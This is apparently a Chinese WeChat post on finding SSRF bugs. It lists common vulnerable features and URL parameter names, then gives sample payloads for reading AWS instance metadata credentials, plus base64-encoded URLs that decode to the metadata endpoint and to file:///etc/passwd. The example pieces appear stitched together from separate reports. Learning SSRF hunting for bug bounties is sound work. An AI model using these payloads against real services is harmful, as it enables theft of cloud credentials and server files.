1.社交分享功能:获取超链接的标题等内容进行显示
2.转码服务:通过URL地址把原地址的网页内容调优使其适合手机屏幕浏览
3.在线翻译:给网址翻译对应网页的内容
4.图片加载/下载:例如富文本编辑器中的点击下载图片到本地;通过URL地址加载或下载图片
5.图片/文章收藏功能:主要其会取URL地址中title以及文本的内容作为显示以求一个好的用具体验
6.云服务厂商:它会远程执行一些命令来判断网站是否存活等,所以如果可以捕获相应的信息,就可以进行ssrf测试
7.网站采集,网站抓取的地方:一些网站会针对你输入的url进行一些信息采集工作
8.数据库内置功能:数据库的比如mongodb的copyDatabase函数
9.邮件系统:比如接收邮件服务器地址
10.编码处理,属性信息处理,文件处理:比如ffpmg,ImageMagick,docx,pdf,xml处理器等
11.未公开的api实现以及其他扩展调用URL的功能:可以利用google语法加上这些关键字去寻找SSRF漏洞
一些的url中的关键字:share、wap、url、link、src、source、target、u、3g、display、sourceURl、imageURL、domain……
12.从远程服务器请求资源(uploadfromurl如discuz!;import&expostrssfeed如webblog;使用了xml引擎对象的地方如wordpressxmlrpc.php)
通过可回显ssrf获取aws元数据
/latest/meta-data/aws元数据目录:
https://█████/api/v1/download-url?url=http://192.168.1.1/latest/meta-data/
https://█████████/api/v1/download-url?url=http://192.168.1.1/2021-07-15/meta-data/identity-credentials/ec2/security-credentials/ec2-instance
发现以下端点易受SSRF攻击:
https://127.0.0.1/ro/aHR0cDovLzE2OS4yNTQuMTY5LjI1NC8jdGVzdC5qcw==/-1430533899.js
有效载荷是base64编码的:
file:///home/abenavides/#.js
使用#是因为url的末尾必须在javascript中,但为了在url中忽略它
SSRF:
你也可以使用url来触发SSRF:
-
要访问aws元数据,您可以使用以下网址:
https://127.0.0.1/ro/aHR0cDovLzE2OS4yNTQuMTY5LjI1NC8jLmpz/-1430533899.js
ZmlsZTovLy9ldGMvcGFzc3dkIy5qcw==
小结:
ssrf漏洞存在点在与内部文件请求和内部服务器请求地方居多,细心挖掘总会遇到。
免责声明:
「由于传播、利用本公众号虫洞小窝所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及作者不为此承担任何责任,一旦造成后果请自行承担!」
虫洞小窝
bugbountyorredteam
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论